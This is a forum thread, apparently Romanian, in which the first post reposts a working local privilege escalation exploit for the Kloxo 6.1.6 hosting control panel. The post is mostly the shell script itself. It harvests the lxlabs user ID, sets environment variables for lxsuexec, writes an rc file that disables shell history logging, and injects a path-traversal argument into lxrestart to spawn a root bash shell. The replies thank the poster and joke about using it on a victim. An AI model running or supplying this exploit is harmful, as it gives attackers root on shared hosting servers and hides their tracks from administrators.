Kwelwild Posted May 13, 2013 Report Share Posted May 13, 2013 Kloxo 6.1.6 - Local Privilege Escalation#!/bin/sh# Exploit Title: Kloxo Local Privilege Escalation# Google Dork: inurl:kiddies# Date: August 2012 or so# Exploit Author: HTP# Vendor Homepage: http://lxcenter.org/# Software Link: [download link if available]# Version: 6.1.6 (Latest)# Tested on: CentOS 5# CVE : None# This exploit requires you to be the Apache user, or another capable of running lxsuexec.LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`export MUID=$LXLABSexport GID=$LXLABSexport TARGET=/bin/shexport CHECK_GID=0export NON_RESIDENT=1echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trcecho "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lollxsuexec /tmp/lol Sursa: Kloxo 6.1.6 - Local Privilege Escalation Quote Link to comment Share on other sites More sharing options...
TheOne Posted May 13, 2013 Report Share Posted May 13, 2013 Mersi mult! Quote Link to comment Share on other sites More sharing options...
ciulama Posted May 14, 2013 Report Share Posted May 14, 2013 10 char: escaladeaza-l pe fraieron: ms Quote Link to comment Share on other sites More sharing options...